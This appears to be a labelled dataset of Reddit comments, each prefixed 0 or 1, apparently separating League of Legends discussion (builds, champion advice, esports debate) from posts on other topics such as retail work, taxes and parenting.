1	I'm a support main, and yesterday I played with Thresh one game. The game started pretty bad because I failed 2 hooks, hitting both to a minion. The other team did have a Janna, and she said to me: "Are you Madlife?", I didn't answered and I tried to do my best. I did some good plays hooking the enemy Lucian (and the pro Janna) some times during the lane phase which allowed my carry to get some kills. The game was close because they had a fed Jarvan, and a fed Kassadin. On the few fights we had, I tried to stop J4's combo (with flay) so he couldnt get close to my carry and then try to hook the fed Kassadin. I did that few times and my carry did survive like 80% of the fights, which allowed us to win the game. That Janna bought Mejai and ended the game 0/10/X, with less than 5 stacks, so my question is: Why people has so bad manners in soloQ when they cant even show their GOOD skill?
0	By saying too much free market is a bad thing, I am trying to sum up the idea that a completely unrestricted market, as desired on /r/Libertarian, will not fulfill their goals.   A free market will remain free for only as long as it takes an individual to accumulate enough money/power to influence the market in his favor. Then the "free" market disappears. Clearly, the same can be said of overregulation of a market by government.   But without a balance of both (government regulations preventing market manipulation) the supply and demand economics libertarians seem to desire will disappear.
1	Well, I mean if I was a pro, it would be a better use of my time using Lee Sin in solo queue since hes actually mechanically intensive. Most other competitive picks are just spam qwer and require map awareness more than mechanics, so they can easily be picked up in scrims.
0	I went to Uiversity for 5 years and got 2 degrees. A friend offered me a job doing road works when I graduated while I looked for something in my field so I took that. Was doing the stop/go sign outside a school where we were working and people would always make jokes about what qualification I needed etc (mostly light-hearted jokes but still pissed me right the fuck off). Took great pleasure in telling them infront of their kids that I went to University and would up a road worker so I should have just gone straight into that line of work after high school. They all tried to hurry off before little Jimmy or Sally got bad ideas about doing physical work.
1	Fuck you.   Look on your minimap. Put wards there. Stop crying over bullshit like this. Everyone tries to be like the pros, but they also do not call mia's in soloq. Because they are actually intelligent enough to use the minimap and wards somewhat correctly.   Learn to do that too.
1	Great idea. You can use WW as well.  But in my opinion ou should not hide your scars. Each wound a memory, each memory makes a person to who he us. Those scars are part of you, and you should not have problem and should even e priud to have those marks. I know you might think they are ugly, but it shows that maybe you are scared from the outside, but you are a fighter and aint gonna give up. I have lots of scared, i have some i. My face, chest, shoulders, back, and on one knee but i am proud to show them. Because they are part of me.
1	lol in normals you didn't achieve anything so there is nothing to reward.
0	My family and I came to the United States from Nairobi, Kenya when I was 8-9 years old. A family friend decided took me us to a local swimming pool one day and I remember being so fucking excited! (We lived in the city and the only time I've been seen a large body of water other than my bathtub was a beach when I was 3 and the one water park I knew of that my parents drove by and I would pester them to take us.)   I remember walking in and just staring at all the kids and the huge pool in front of me, and of course a glorious looking slide. It wasn't a huge slide or anything, but when your small everything looks huge.   I was so excited I climbed up the few steps to  the slide and slide right down without a second thought. I imagined everyone is born knowing how to swim or that we all just float.   Next thing I know I'm being pulled out of he water by a pretty white girl whom after realizing I was awake and okay and my mom was there she walked away. I don't know if she was a lifeguard or not but I was very thankful.   To all you lifesavers out there! I appreciate ya!
1	Im sorry but the math is still off. I wasn't guessing, I did the math myself some time ago, just don't know the exact numbers anymore, however I still have a decent understanding of it. You are not counting in the magicpen from sorc shoes, runes, and masteries, which all make the deathcap more favorable. Also your choice of a champion that has "high scaling" is a bit off too, try looking [here]( It hasn't been updated in a while, but it will give you and idea of the base ap ratios, which correspond to the initial burst and also the ap per second, which corresponds to the sustained damage.   EDIT: Also, considering how the items are, and how the natural scaling of armor and mres works, it is still favorable to build %armorpen against targets that don't get armor items, however it is a waste to build %magic pen against targets that don't build mres, which is a huge factor in this whole argument.   You shouldn't be so quick to type an all caps
1	So if two NA teams had went against eachother in quarters and were guaranteed to go in finals, and the two CN teams were against the two favorites to win the entire tournament, that would make NA better than CN? There's no logic to your statement. Two NA teams doesn't prove anything because at least 1 is guaranteed to go to semis and then get shit on by KR anyways. It's the same with the two CN teams going against eachother.   Also, I never said SSB plays a shit game. Either you're staying up and not watching SHRC vs EDG and just arguing because you would rather argue than actually look at the games that are being played. Najin White Shield vs OMG and later SHRC will likely show the gap between CN and KR to be just as big as NA and KR. I never said CN is shit, I said CN is just as shit as NA compared to KR. KR is like a lobster dinner, and NA and CN are like McDonalds and Burger King. You can't fucking compare mcdonalds and burger king to a lobster dinner. It's still edible but it's nowhere near as refined, which is the gap between Korea and other regions. Hell, OMG almost didn't make it through past LMQ which was seen as worse than all other NA teams at worlds.  These first 4 games of SHRC and EDG have been which team sucks the least. I don't think any of the KR teams would be this hesitant to punish these mistakes.   I never said NA would stomp CN, that's putting words in my mouth. However trying to say CN is a step ahead of NA so far hasn't had very much credibility when CN's #1 seed didn't even beat their own #2 seed, and it looks like SHRC is like the C9 of China, being the stronger looking team from their own region despite not placing first in their own region.
0	Oh dear, here comes the misinformation. I'm used to people forgetting about varied state laws and/or having no clue as to what the rules really so let's just get through this:   > You cite the passing rule because of "emergency vehicles" but if you're speeding it's not legal, which you certainly are.     Grossly incorrect assumption that passing = speeding. I often pass people going 10-15mph slower than the speed limit while I maintain it. I wont even go into the legalities of momentary speeding while passing in some areas.   Note that I said "passing/left" lane which is important because not all states are passing only. You can legally "cruise" in it provided you aren't impeding traffic. Often unenforced and people are unaware it exists.   In many states speed is technically irrelevant to the statute. If you impede on the left, you impede. Sometimes it's based off # of cars stuck behind you (mountain passes for example) or other variations. Of course, if you're at 95mph doing it you're also breaking  that  law.      > Traffic happens because of volume not because of drivers on the road that prevent you from driving like you're on the autobahn.     Actually, there are various studies/models that have shown traffic is often caused by [ripple effect]( incidents such as improper lane changes, adjusting for slow left traffic and other factors ([MIT paper]( way beyond just volume only.    You may joke about the Autobahn but damn if they didn't get that one right...and it's not because of the "unlimited" speed.    So yes, things like driving improperly can actually cause traffic and make it worse for everyone. Not just those "asshole speeders" you think we must all be to be annoyed by slow right traffic.     edit -
0	I'll try to avoid statements that make me seem ignorant. Let me know if I've failed that.   Being 17 I have an undeniable urge to defend fellow teenagers. That said, not everyone deserves my defense. One should exercise caution when generalizing a statement about any group, because those they mindlessly condemn that do not fit the preconceived mold by which they judge will inevitably feel betrayed. I'm not saying you're all wrong, I just feel some people are pointing a gun at others who don't deserve it, while hiding behind the excuse that they're a teenager and by extension (one which evidently need not be proved) they are guilty. Understand there is a difference between people that are obnoxious, ignorant, pretentious, immature, and ill-tempered that happen to be between the ages of 12 and 20 and the entirety of teenagers.
1	I agree with this entirely. As a side note, it's been my experience that teams at lower elo usually just need one person to tell the team that they're doing well (or if they're not, how they can improve and win the game) and make smart calls and play decisions.   That's how I carried myself to 1300 (and showing no signs of stopping) playing only support characters mostly soloq. People said it couldn't be done, guess they were wrong.   And you can talk about 4v5s and feeders all you want but honestly, if you're good enough you can get it done. We had a Udyr disconnect at the beginning of the game due to comp problems and not only won but stomped as 4v5 without a jungler. Similarly, a friend and I were duoing and the mid lane was feeding hard - like 9 kills for 0 to an AP Sion. We simply let the others know that no matter how fed the Sion was he would drop pretty hard if we focused him in teamfights and he couldn't stand up to a Sona/Vayne combo playing smart. The game ended in a win for us with the Sion complaining about how stupid his teammates were.
1	morde is a tanky AP champion;   jarvan is a bruiser;   talon is one of the strong(er/est) assasin's atm;   Talon would be the closest to yi/gp in terms of carry potential near play style to yi.. get it kill things get out Graves can be a really scary champion; He counters most AD in lane and has tons of upfront damage. Those two are more like master yi/gp in terms of play style unless you go atmogs metagolem with gp. J4 and morde are in a different "category" of champions namely tanky ap/dps or bruisers. Which try and get a balance of defensive and offense items namely the item combination atmogs (Atma's impaler and warmogs armor) rather then go straight glass cannon itemization wise. Morde is a champion that has a lot of upfront damage and can be extremely tanky/durable without the need of shiny hp items because of his shield generation mechanics.   hopefully this helps a little bit. GL with the picks.
1	I assumed was solo queue. Jesus. Get new friends dude. Seriously, I have a group of mates and EVERY single time we play this one guy locks AD carry. Then goes bot and feeds. Doesn't ward, shit map awareness, just balls. Then proceeds to flame everyone who is actually doing their job for being shit. I am never playing another game with him, seriously.   On a side note, try playing with Redditors. Go to the chat, joing the mumble and have some fun. Try a few normals then when you find some people who are decent play a bit of ranked.
1	Well I am really sad now...   Dignitas completely deserved that win for their performance in the second two games, Crumbz's Lee Sin in particular was amazing. As for Curse, I thought they made a few bad decisions in this series which cost them their chance at worlds but otherwise they played very well. I really hope that they can keep their spirits up for the game vs CLG tomorrow.
1	Not sure I agree with advice given so far, not wholly at least.   Orianna  wants  you to attempt to lane with her. Fuck that. Don't even attempt to lane in any prolonged passive sense with her, because she can out-harass you for free.  Jump on dat robot (!!!1)  whenever your cd's are down, particularly with a bursty AD champ like Corki, and push her right out the lane. And don't wait until she's already harassed you to half health, because that's her plan.   It'll make her use her flash because she has no reliable escape, almost guaranteed, which will make her an easy gank target if she thinks it's smart to stay in the lane with low hp.
1	Her ult actually does require some skill to use. I remember a couple weeks back there was a thread for people asking mains of champions for tips on how to play certain champions and a lot of people asked how to play Kayle and I gave a lot of good tips in that thread. Her ult is not just press R on someone, you have to first determine who is fed on your team, who is most likely to be focused, etc. In team fights, depending on the positioning of your team, you may have to ult a different person each team fight depending on who is where. Also, a lot of people think a good Kayle ult is when you ult someone who is low and about to die - but that's not good. A good Kayle ult is when you ult someone BEFORE they take a lot of burst damage that way they can get out of the fight with all of/most of their health remaining rather than end a team fight with no health and have to back. Also, she most definitely does not have single target burst anymore, she used to be able to two shot people but now she takes 5-6 shots even for squishies. Besides, she has LESS range than Vayne.
1	Just the quints. See the problem isn't with spell vamp itself. Many people see the spell vamp quints and think "oh if I stack all spellvamp sources I can achieve 31% vamp, or 56% with double wota!" and that's all well and good, but it is best to look at things by what could directly replace them. 3 or 6 percent spellvamp  is  good, and you could be very succesful with it; however I guarantee you will have more fun with this game striving to achieve optimal play and champion strength rather than going with what you like without looking at the options (not that I'm saying you do this, I am just generalizing here. You obviously want to improve or you wouldn't have posted here :) !) and the best way to optimize is to look at each individual facet of character customization and trying to get the best possible values out of it. So, while a full stack of spell vamp would be good, it is better to look at each individual source and see what you are actively depriving yourself of by doing so. That 3% spellvamp from the quints gives you almost  no  benefit in a battle (30 hp in battles where you deal a whopping 1000-3000 damage, on mundo who has loads of hp) and rather almost all its effects are evident outside of combat, where you slowly leech health from the jungle. Going for the frontloaded flat HP quints improves your damage through max hp scaling, enables you to be both more difficult to kill and better at killing in champion combat, works as a frontloaded resource for Mundo's moves, and generally improves you in many ways. They are really some of the best quints on any champion, so when you consider that on Mundo you additionally gain hp regen, ability damage, and ability resources you can weigh them even more for him.   Looking at masteries Mundo basically screams for 21 defense, it's probably the best tree in general and it amplifies all the things Mundo wants to do, so spellvamp from utility seems to be giving up quite a bit.   Now with your WotA you have to realize that A: Mundo really likes max hp as his way of having hp because he gains 3 additional ways of scaling from it compared to most champs and WotA gives you "effective max hp" by healing you constantly but won't actually improve your scaling like max hp (keep in mind max hp gives you hp regen so it essentially heals you constantly too) and then B: Mundos defenses are mostly all HP (rather than resistances or %damage reduction like other champs) because he scales so well with it, so getting a small amount of additional flat hp is incredibly cost inefficient compared to other ways of buying non-flat hp items that you want to improve your champ defense wise.   WotA is good because it gives you offense and defense together, in a cost efficient way. It also lets you stay away from base for a long time for prolonged farming and objective taking and defending, but Mundo doesn't make use of this because he already has infinite sustain with his ult. The other benefit of WotA is improving your teams' damage and defense. This does suit Mundo because he reliably becomes very very hard to kill no matter how much gold he has, so improving your teammates with your own money is a worthwhile investment.   A better strategy for item alternatives with offense and defense past the mandatory max hp items on Mundo might be something that gives resistances, such as Wits End, Hexdrinker, or Abyssal Scepter (Or Banshee's Veil, Randuins, Rod of Ages or Sunfire Cape to get resistances with more HP, indirectly improving your offense while building resistances) for attack speed with magic resistance, attack damage with magic resistance and ability power with magic resistance respectively. Atma's Impaler would give AD and armor, Zhonya's would give AP with armor. All of these items would be somewhat decent on Mundo (though not all are optimal) and would likely be more cost efficient than WotA simply because Mundo doesn't need sustain and he needs resistances to cost effectively balance his high HP levels. In terms of items that help your team while giving Mundo desirable stats Zeke's Herald, Locket of the Iron Solari, Randuin's Omen, Abyssal Scepter, Aegis would all likely be effective alternatives to WotA. Most give resistances and most give you HP as well.   I hope I said something useful. I should tell you that I don't play Mundo so take what I say with a grain of salt.
0	Here comes a whole entire thread about how having no kids and dual incomes is so much better or whatever the reason is for having no kids reddit chooses to focus on that day. In this case what do you expect? It's a fucking human being inside of her!   I'll be honest with you. If you get your shit together and have kids early (twenties) your wife's body will recover much better than when you wait until you are in your thirties.   I just hate when I hear people say, "that's why I'm never having kids" over such stupid excuses. Such as, her vagina gets stretched out, sex life dies, cost too much money, or her body will look shitty, etc. Just say you have no interest in raising a child.   Obviously I have a skewed perspective as I have a wife and 2 kids myself. It's not easy but it's something you choose to do together. When your old and look like shit anyway you will be very happy that you have your kids to watch grow up with their own families.
0	I work in retail too and the amount of customers who throw tantrums when they've read a sign wrong is unbelievable. I understand that the smaller print on our sales signs can be harder to read, but that's no reason to call me names and blame me for the company's font choice. And the old "that's false advertising" claim is really ticking me off. So many people also think if the price is wrong they get the item for free. Nope! That's supermarket policy and in case you didn't notice, this isn't a supermarket! And I cop the flak for that, too. One of the very first shifts I worked a guy gave me a big note for a small purchase and then asked me to change some of the change around (classic money move-I wasn't fooled, sir). I said sorry I can't and he let it rip and demanded to see the manager, who told him he was an asshole and tossed him out. So relieved! All this being said, 90% of my customers are fine, it's the 10% of idiots who leave a longer imprint on you. We're people too, just like you!
1	I know the people who hire the casters want non-stop talking.   But for what my opinion is worth, if you have nothing to say, don't talk. If you have something insiteful like "Oh wow, Morello's Evil Tome isn't a common item, let me explain why the player got this." but when it's crap like "Well Graves has built some attack damage, he's sure going to want to do some damage to people!"  Yeah. No shit.
1	At 180 normal wins, your mechanical skills, game knowledge, reaction times, and even maybe map awareness are not full developed. 70% of ranked games sub 1100 ELO either end in surrender votes at 20 minutes or are thrown late-game because people either:   a) get stomped in lane and have no idea how to recover   b) can't make plays   or   c) don't know how to expand on their advantage when they're put ahead   Also, you don't do it because your definition of "fun" may be another's definition of "pain."   Say I just got Level 30. I've heard about ranked games from a forum, maybe, or a more experienced friend. So, I queue up for a ranked game. I have never watched any streams, read a few guides, though I don't know how any of the items benefit me, I can't build masteries or items situationally, I've never worried about last hitting and I never buy wards. I get into the ranked game and see that champions can be banned and that I have to wait for my turn to pick my champion. Considering that I've only played in low ELO normals, I pick Yi, even though I'm last pick and the team needs a support. I see a Soraka with Clairvoyance and Heal and call her a noob because I never use those spells. I get into the game, buy a Doran's blade and immediately go top even though Riven already called it because I have no idea what the meta is. Ultimately, my goal in the game is to Alpha Strike onto enemies and then kill them, that, and autoattacking minions. I feed 7 kills to the top lane Tryndamere after 15 minutes and then decide to quit because I'm not having "fun" anymore.   There's a very thin line between your fun and my pain. Some people can have fun losing, some people can have fun winning. The latter are the ones who will do anything to win. The former will be the ones who lose you games because they don't care.
1	As a diamond player what people don't realize is that all tier levels are similar. There's ragers everywhere, trolls everywhere, people with bad strategy, bad mechanics, blunderful people who aren't even paying attention.   In diamond, today, I had a first pick vayne who doesn't ban thresh, and then wonders how he loses the game vs thresh+draven and draven kills everyone because of snowball. Then the very next game, he picks something he's actually good at in mid and wins his lane, and because it's anivia you can't counterpush and he kills everyone due to snowball (so basically I lost two games because of this guy).   Then the next game, the enemy team has a completely stupid vayne that I completely outplay in every level---but this is a guy with incredibly good stats with vayne.   So my score for the day is 1 win - 2 losses. But 2 of the games had really not much to do with me.   But the only difference in diamond is, people are more quiet, less rageful. Less likely to troll fully. But they still don't know basic strategy etc., or they forget for that 1 game. That 1st game vayne, didn't even realize that when she showed bot, the enemy did baron. Like the most obvious blunders that ruined the game, this guy is plat 1 though. People are just incredibly inconsistent.
1	Riot doesn't have jurisdiction over Twitter, players,  like in any normal sport, always have rivalries and shit talk eachother.
0	I used to live on a very busy road in up in the mountains of North Carolina. It was a guarantee that every time it snowed, the plows would make a 2-3 foot wall in front of my drive way. There was no possible way for me or my room mates to get out, so we went out with shovels and started digging away.   Not 30 minutes into our dig, a company pickup with a plow on the front stops, honks at us to get out of the way, and then proceeds to push his plow right through the wall. He then waves, backs up, and leaves.   This happened EVERY TIME it snowed. We never worried about moving the snow, because people in the mountains get it. We even had to shovel our car out once because it was stuck in ice. Sure enough, someone with a chain stopped and pulled us out.
1	I do like the style that C9 is bringing in. Let us copy the Koreans and win. They are an aggressive team that doesn't have any idea how to deal with teams that play their game. Unless they do their homework, they are gonna get hit hard at worlds. While teams like solomid, dig, and clg are on the back line, they are still adjusting to the new meta. Honestly there is nothing wrong with the NA scene. NA has always been more farm, aoe fights oriented, it is just sad that sometimes ego comes first and we adjust slow to aggression teams like the Koreans, the counter jungling style of the Russians and overall the bizarre Russian style. The one thing we can learn from the Koreans is that no champion is considered weak. Implement that, and we can compete on the same level as the Koreans and Chinese.
1	This may sound weird, but I played with a guy that had a similar name a few days back, and he got extremely angry at another player on our team who was not doing well. I myself got mad initially, because the person was playing Nocturne and was constantly leaving his own lane unattended to wait in bushes next to other lanes to attempt to gank, but this guy, playing Vlad, just went off on Noct the rest of the game, literally spamming both allied and all chat after each time Noct or any player on our team died, and kept saying that he was playing the game only to win, and that not winning was pointless in a game meant to be competitive.
1	Yeah it's an interesting idea, but I don't think it's really needed. Basically, to get someone to purchase wards, we shouldn't have to trick them into doing it. The benefit of a ward should be apparent to anyone that's level 30, which it is I think, but low level people tend expect certain team members to get all of them which is wrong. It's also part of learning the game. A person playing mid lane at bronze elo and not warding at least one side brush is the difference maybe between him staying there and getting into silver (a bit of an exaggeration here.)      Your idea of giving bonus stats for buying wards is interesting but lets think about the players this is targeting. If the stats are too low, people at low elo are gonna say it's worthless anyway, pretty much anything below 5 I would think. Too high, and suddenly you have something that increases lane snowballing. Say you FB someone, go back and buy two wards, each granting between +5 Ar/Mr. Your opponent is trying to scrape together a few items just to survive the next couple of minutes to get level or get a gank. You've purchased those same items, possibly more, plus the wards, thus making it harder to ever exchange positively with you.      I think in the end, Riot would be better off making more advance tutorials that explain gameplay mechanics at a higher level than just, kill these creeps, kill this champion. I think what exaggerates the non-ward buying at low elo, is that it is extremely hard to jungle unless you are on a smurf and know what you are doing. No one helps leash unless you know to ask for it, and then the leashes can be interesting to say the least. Also because no one has runes, and they don't adjust the jungle creeps for the summoner level, you can get pretty messed up, possibly not able to complete your first clear. This all leads to people pretty much staying in lanes and not worrying about ganks for a long time. I'd say pre level 7-10 people will routinely start off in a lane and go that lane over and over until the game ends. There is a certain charm to actually not knowing what is happening in the game.      I can kind of remember how I thought as a new player, and really wish I could watch myself first learning the game right now. I think Riot encourages this self learning process, but could really help out the low level community by imparting a lot of what has developed over the last couple years to newer players. I've recently been helping my friend try to learn the game and he's already better in specific roles than the majority of players at his level 24-25 range.
1	Not really. The full changes are a nerf to ap maokai and a buff to tank maokai. His E lost 100 base damage, his W does lower damage to squishies until 28 minutes (ish) (the ap scaling is roughly the same against squishies) so unless you're using your root to cc a tank (good for peeling but wasteful imo) it's nerfed. The lower cooldown is nice but I feel the range nerf (650 -> 500) is huge, and the cooldown reduction doesn't make up for the lowered range. His ult aoe radius got reduced it seems like; you can use it for a chasing tool now as all 4 abilities have cc. But his range on his q and w are so short that he seems bad at chasing regardless.
0	Holy moly. Been looking for something that has mostly physics/astrophysics. I thought I knew all the good chans; PBS, NGC, (former)TDC, BBC. I just downloaded a torrent of 300 BBC Horizon shows a couple of weeks ago,from about 1984 to present. They have been pure quality since way back then. Interesting to see them all back to back, I encourage everyone to check it out. There are probably more than 300 of these, but that's the biggest collection I could find.   Edit: oh yeah, the reason i posted: One of the shows claims that they have actually measured the existence of a 'parallell universe right 'inside' ours in a way; supposedly it gives off a radiation that only a nearby universe could emit. (IANAAP). I mean, I've heard 1000 theories about parallel universes and multiverses; but here's a bearded guy pointing at some device and says 'yeah its there'   Another one claims they know what dark matter is; they nonchalantly say its two bosons coupled together so that it doesn't react with normal matter (much like neutrinos) but still is related to normal 'our-universe' gravity; hence we get these huge galaxies that we have and we can now explain it.(Me still IANAAP, probably don't remember the correct terms here)   But I thought we were far, far away from knowing this. (I just find these things extremely interesting, even if I have no idea of about the actual maths behind all this.)   (IANAAP=I am not an astrophysicist.)
1	Let's assume you have a DFG by level 9. You should have 82 AD without any AD masteries or runes. So second, your AP,   100 (DFG) + 19 (runes) + 15 (Masteries) = 134(1.05 [Masteries]) = 141. So with 21/9 and AP Quints/Scaling AP blues you have 141 AP at level 9 with just a DFG, and 8 MPen from runes (not a whole lot of mpen).   Third, your skills   Rank 1 R, Rank 5 W (220 base + .8 AP), Rank 2 E (105 + .7 Bonus AD), Rank 1 Q (30 + 1.0 AD).   Fourth, total damage, assuming you double activate W and start with enough stacks to Leap > E > W W > Q a traget with 1.4k HP, 60 armor, and 40 magic resist (after MPen).   DFG (210 MAG) + AA (82 PHY + 7 MAG)) + E (105 PHY) + AA (82 PHY + 7 MAG) + W (333 MAG) + AA (82 PHY + 7 MAG) + W (333 MAG) + Q (112 PHY + 7 MAG) + Ignite (230 TRU) = 463 Physical Damage/210 + 694(1.2) Magical Damage/230 True Damage.   For a total of 1735 mixed damage before resistances. After resistances the total is  287 PHY + 740 MAG + 230 True = 1257 damage. Not quite 100-0 status, but close. The HP estimate is moderate, but the Armor/MR estimate is a bit low for a level 9 bruiser.
0	That's the whole concept behind taxes. You aren't always going to "get back" what you put in in a concrete way that you can see. But when your tax dollars go to things like educating others, maintaining infrastructure, healthcare, it benefits everyone, including you.   Other people becoming educated improves the entire economy and boosts GDP by allowing people to get better-paying jobs, thus spending more. Education also gives people the skills needed to create better things like your favorite video game or a super economical car and so on, which you can benefit from not only by having access to a product that changes your life quality but creates money through sales and exports that benefit the whole country.   Having universal free healthcare means that person who comes up with that idea or product is able to do so, instead of suffering from terrible migraines and not being able to see the doctor. It means that if you are a boss, your employees are happier, more productive, and less likely to need time off because their illnesses are taken care of before they get to a critical point. It means you don't have to watch your cousin/sister/mom/son suffer for years (maybe even die) with a debilitating but treatable health condition that they can't get fixed because they can't afford to go to the doctor and get treatment.   Finally, even if the poor benefited more than the middle class in this economic circumstance, the middle class still benefits more in this system than the US system. Just because a homeless person benefits more from universal healthcare than a person with decent health in the middle class doesn't mean both aren't better off or that it isn't worth it to have a system like that. Plus you never know when a catastrophe might happen to you and you need that help provided by such a system.
1	Sorry if I offend you by the following, please note it's all positive critics to help you improve (also my English sucks today hehe).   Key advice for improving yourself and handling "bad-team" situations: Record your games and look back, why did I lose farm? Why did I die there? How should I position next similar fight? Did I back to soon? Did I back to late? In your screenshot you post your Twitch link. I searched up that specific match and these are my improvement points with timestamp: Level 2-3 - Strong dominating lane phase for Anivia. Especially since Lux doesn't have her shield leveled yet. You use your Q to farm minions. Lux immediately punish you. Towards level 5 you have missed approx 10cs because of you using Q on them and your minions finishing them off. Drake point. Stupid engage on drake by jungler, these things make the game unnecessarily harder than it should be. You should've forced him with the red mark ping to back off and note him on the fact there is no proper vision and Blitzcrank was already there before he even started. Take the leading voice in your team, but be careful, leading is commonly seen as "flaming". So keep a commanding tone, but only state the facts. When something goes wrong, just ignore it. You made your point earlier.   You gank bott lane, taking the kill on Graves from Cait whilst Graves just got a kill on Leona... As Anivia, one of the easiest farm champs in the game, this is not recommended. Go for the assist unless it's a 100% kill secure. A snowballing bott lane mostly means drake secures, strong mid game. Also when they have pushed it out, the support will start warding your lane and key points. More comes than meets the eye.   Around Level 11. You are bott lane, atleast 10 seconds you do not use your Q. Don't forget it's a stun and you guys are with 3. You have blue buff and an high damage AOE slow AND IGNITE. Go for the risk, you could win it. Right after you went base, Lux pushed your mid turret, their bott lane is snowballing hard (resulting in that same drake secure, but for the other team).   At this point, your team is probably behind 5-8k gold.   Graves and Zac pushed bott tower down. Graves is done snowballing your bott lane, now he pushed the second tower within a few minutes... This COULD be different if cait got that early kill you took unnecessarily.   At this point you are starting to flame. Which your team does not deserve, since they are not INTENTIONALLY playing bad, they just lost the lane phase and are logically behind now.   I cant stress this enough: Start using your Q, spam it whenever you can. 9 out of 10 Q's are for farming purposes right now... During teamfights, you just dont use it...!!   The reason you have a good score is because you mostly use skills to lasthit in teamfights and then run off letting your team die. Anivia's R can also work as a frightening spot to stand on, people tend to turn around and walk off. A good Anivia will make people fear when they are to close because of her stun, followed by huge bursts... Well they had no reason to be feared.   I stopped watching at this point. You deserved the loss.
1	What in the
1	Are you stupid? First of all, the fact that I main GP is HUGE in this argument.   >"listen dude, I'm the best, don't even try anything else because it's wrong before I even look at it."   I didn't say this, or anything CLOSE to it. I said AP GP is bad. Don't believe me? His Q has NO Ap ratio. With new Lichbane it does (105 base AD level 18) + 500AP? = 355 DMG (DAMN THAT BURST, Critplank doesn't do 1k damage per Q or anything...). The heal on your W? 1.0 Ratio, sure. By the time you can use the heal and receive the full 700~ heal, you're most likely dead due to lack of tankiness. If you don't use W to remove CC you die instantly, so it's useless. Your E? Virtually useless stats on APGP. Sure, free move speed. Your ult? Absolutely horrible scaling and unreliable. You can do 0 damage with your ult, no matter how much AP you have if no cannonballs hit. Even so, the ratio is lackluster and is useless even for teamfights. It's only relatively good for AoE slow on disengages/engages.   MEANWHILE.   Korean Gangplank of Stattik Shiv + Wits End is great. Your passive (GP has a passive, today you learned) is a 40% slow at level 1, as well as magic DoT. If you abuse the passive with the Shiv's passive (which can crit magic damage) as well as wit's end passive (42 bonus magic damage on hit, plus stealing MR), you do tons of damage. Building full tank from there, means you can reliably survive and actually be relevant to your team.
1	I think the servers problem is in every region then? Because here in the (sadly, someone save me) BR region the servers run on potatoes, it has been more than one year and Riot is still to figure out how to make features like spectator mode work here.   Also it is almost impossible to get banned unless you take a picture of you fucking a baby panda in the ass while you play in a bought account using scripts and DDOSing the servers.  Now you have to take the picture and send to someone who works at Riot BR, better chances to be banned if you send together with a R ioter relative that you just murdered.
1	Froggen is without a doubt the best Anivia player in the world. EG (previously CLG.EU) has some ridiculous win rate with Froggen on Anivia -- even beating out M5 a few times at their prime. On top of that, EG's whole team strategy - turtle until super late game - is a perfect match with Froggen's Anivia.
0	It's villain specific, so the answer is always, "it depends."   And as long as we are going to kill the joke, this particular analogue of poker is not a zero sum game, as there are outcomes in which both players profit.  For example, she is bluffing and he calls, knowing she has many bluffs in her range.  He stays with her and gets a favorable outcome. But she also stays with him which must also be a favorable outcome (if not optimal) because otherwise she would have left him and it would not have been a bluff in the first place.   Thus, her bluffing and him calling is plus EV for both of them.  There are many other interpretations we can come to regarding this situation that makes it more complex than you would normally think of a two possible outcome game, depending on the relative utility each of them receives from staying or leaving the relationship.
0	If anyone cares about my two cents on weight lifting protocol.  I would say from personal experience that you HAVE to lift heavier every week and progressively move up in weight.  It's the only way you will get bigger and stronger.  Yes, form is important don't get me wrong.  But sometimes, it's perfectly fine to cheat on some heavy reps just to be able to lift it and break a plateau.
1	I don't think he is, but I smell an incoming lore update in the near^soon^riot^tm future regarding the darkins.   Bear with me for some minutes.   As you said, with the release of Aatrox, we learned that there are apparently 5 remaining Darkins.   3 has already appeared in updated artworks or lores (if it's not Aatrox in all of them).   If we start from the hypothesis that it's not Aatrox, but a different Darkin in each of them (IMO very unlikely, but let's say it is), we could think each Darkin has selected a warrior to represent him :     Aatrox chose Tryndamere   Darkin2 chose Jax   Darkin3 chose Darius     That would means that there are still 2 Darkins who need to elect/choose/raise a champion to represent them.   What if the 5 Darkins are all ennemies, and they will fight in the field of Justice through their chosen representative ?   We know a 1v1 (& 2v2) map is coming : what if the release of this map would coincide with the realease of a new lore, revolving around that Darkin rivalry thing ?
1	I asked this in the monday beginner guide and I got some math done for me.   EDIT: Here is the link to his comment   Go give him an upvote not me.   ALL CREDIT GOES TO /u/Nate45 FOR THIS.   > I'm bored so I'll do some math... > Assume you're a level 12 vayne and you already have blade of the ruined king and zerk greaves and +35 attack damage from runes/masteries/doran's/whatever and +4% attack speed from masteries. > Your next item could be either infinity edge or trinity > assume you maxed tumble first, you have four points in silver bolts, and you tumble once for every 2.5 seconds of strait stand still auto attacking and you get a trinity proc everytime you tumble. assume enemy has 1500 max health for the purposes of silver bolts and your opponent has 100 armor after whatever so i'm just going to punch in silver bolts damage as double the value of regular damage. > Your auto attack DPS is calculated as: > .658 [base vayne attack speed]   1.981 [bonus attack speed %]   ( 149 [your attack damage] + (.07   1500 + 50)   2/3 [silver bolts damage]) .... multiply that by 2.5 and then add 149   1.5 [tumble damage] + (.07   1500 + 50)   2/3 [silver bolts tumble proc] > so crunching the numbers, your damage over 2.5 seconds with a tumble + some autos is 1149.12. > Add triforce and do the math again: > .658 [base vayne attack speed]   2.281 [bonus attack speed %]   ( 179 [your attack damage]   1.10 [crit] + (.07 1500 + 50)   2/3 [silver bolts damage]) .... multiply that by 2.5 and then add 179   1.6 [tumble damage adds with crit] + (.07   1500 + 50)   2/3 [silver bolts tumble proc]+178[Sheen damage] > crunching the numbers, your damage is now 1694.28... which is 545.16 more than it was without trinity force. > next, do it with IE instead of triforce: > .658 [base vayne attack speed]   1.981 [bonus attack speed %]   ( 219 [your attack damage]   1.375 [crit & crit damage bonus] + (.07   1500 + 50)   2/3 [silver bolts damage]) .... multiply that by 2.5 and then add 219   1.875 [tumble dmg/crit/crit dmg] + (.07   1500 + 50) * 2/3 [silver bolts tumble proc] > your damage is 1831.98... which is 682.86 more than it was before. > Since IE just adds pure damage, we should divide 3700g by the 682.86 damage that IE adds to determine the value of "damage"... each point of "damage" in this math experiment is worth 5.418g... using this analysis, trinity force adds 2954 (rounded) gold worth of damage, and it costs 3628g. That's 674g that needs to be made up in other stats on the item. > So the question: is the 250 health, 200 mana, 8% move speed and move speed proc on trinity force worth 674g? If yes, it's worth buying tri on vayne for the mid game at least. For late game infinity edge will scale better (you can pick up IE eventually anyway, it's not like tri is slot inefficient.. could replace PD or something in your build)... i'm too lazy to do late game math right now, anyway. >
